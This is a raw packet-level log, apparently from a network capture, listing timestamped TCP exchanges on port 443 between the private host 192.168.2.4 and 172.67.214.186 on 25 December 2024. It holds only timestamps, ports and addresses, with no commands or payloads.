                                                                                                                                          Dec 25, 2024 22:17:41.480938911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.480987072 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.484282970 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.484301090 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.484364986 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.484374046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.484417915 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.488554955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.488571882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.488632917 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.488641977 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.488683939 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.491920948 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.491936922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.492000103 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.492008924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.492069006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.495521069 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.495537043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.495604038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.495613098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.495657921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.496196985 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.661381006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.661396027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.661484003 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.661494017 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.661544085 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.665533066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.665549040 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.665613890 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.665621042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.665658951 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.668988943 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.669003963 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.669073105 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.669080973 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.669126987 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.673194885 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.673211098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.673269033 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.673275948 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.673316956 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.676697016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.676713943 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.676774025 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.676784992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.676822901 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.680787086 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.680805922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.680859089 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.680866003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.680907011 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.684257030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.684272051 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.684320927 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.684328079 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.684367895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.688630104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.688644886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.688710928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.688716888 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.688760996 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.854969025 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.854990005 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.855061054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.855072021 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.855113983 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.858944893 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.858961105 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.859035969 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.859042883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.859083891 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.862760067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.862775087 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.862840891 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.862849951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.862890959 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.867089033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.867104053 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.867167950 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.867175102 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.867213964 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.870388985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.870404959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.870461941 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.870471001 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.870516062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.874209881 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.874229908 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.874280930 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.874289036 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.874313116 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.874329090 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.877686977 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.877701044 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.877772093 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.877779961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.877820015 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.881853104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.881866932 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.881931067 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.881937981 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.881978035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.047521114 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.047544956 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.047605038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.047621965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.047640085 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.047667980 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.050810099 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.050826073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.050915003 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.050923109 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.050977945 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.054980993 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.054999113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.055090904 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.055099010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.055146933 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.058482885 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.058496952 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.058553934 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.058561087 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.058599949 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.062654018 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.062669992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.062733889 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.062741995 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.062781096 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.066061974 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.066077948 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.066137075 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.066144943 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.066184044 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.070266962 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.070282936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.070359945 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.070367098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.070409060 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.070983887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.073744059 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.073757887 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.073820114 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.073827982 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.073868036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.130256891 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.239502907 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.239525080 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.239593983 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.239605904 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.239648104 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.243717909 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.243733883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.243793964 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.243803024 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.243844032 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.247075081 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.247088909 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.247153997 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.247160912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.247204065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.247617960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.251264095 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.251277924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.251333952 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.251342058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.251384974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.255007029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.255021095 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.255074978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.255083084 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.255120993 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.258886099 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.258902073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.258939028 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.258946896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.258956909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.258986950 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.262351036 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.262373924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.262404919 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.262412071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.262439013 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.262451887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.265770912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.265785933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.265840054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.265847921 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.265888929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.266602039 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.266645908 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.304217100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.432455063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.432473898 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.432533026 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.432568073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.432615995 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.436717033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.436733007 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.436796904 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.436806917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.436851978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.440057993 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.440073967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.440129042 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.440139055 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.440184116 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.444236994 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.444274902 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.444341898 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.444351912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.444397926 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.447690964 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.447705984 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.447757006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.447766066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.447808027 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.451872110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.451888084 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.451942921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.451952934 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.451997995 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.455331087 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.455348015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.455414057 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.455424070 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.455471039 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.459506035 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.459522009 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.459573984 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.459582090 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.459625959 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.525012970 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.533317089 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.625009060 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.625026941 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.625071049 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.625082016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.625099897 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.625123978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.629151106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.629165888 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.629214048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.629249096 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.629256010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.629302979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.632627010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.632641077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.632674932 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.632683992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.632728100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.636791945 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.636806965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.636833906 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.636868000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.636874914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.636924028 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.640427113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.640441895 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.640486002 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.640494108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.640537977 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.644414902 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.644429922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.644469023 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.644480944 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.644495010 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.644526005 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.647856951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.647872925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.647906065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.647913933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.647927999 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.647957087 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.652033091 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.652050972 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.652087927 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.652096033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.652111053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.652132034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.657722950 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.817315102 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.817332983 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.817393064 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.817425013 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.817470074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.822195053 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.822216988 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.822283983 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.822293997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.822343111 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.824940920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.824954987 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.825002909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.825011015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.825052023 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.829058886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.829071999 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.829118013 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.829125881 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.829169035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.832729101 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.832745075 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.832784891 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.832792997 CET44349744172.67.214.186192.168.2.4
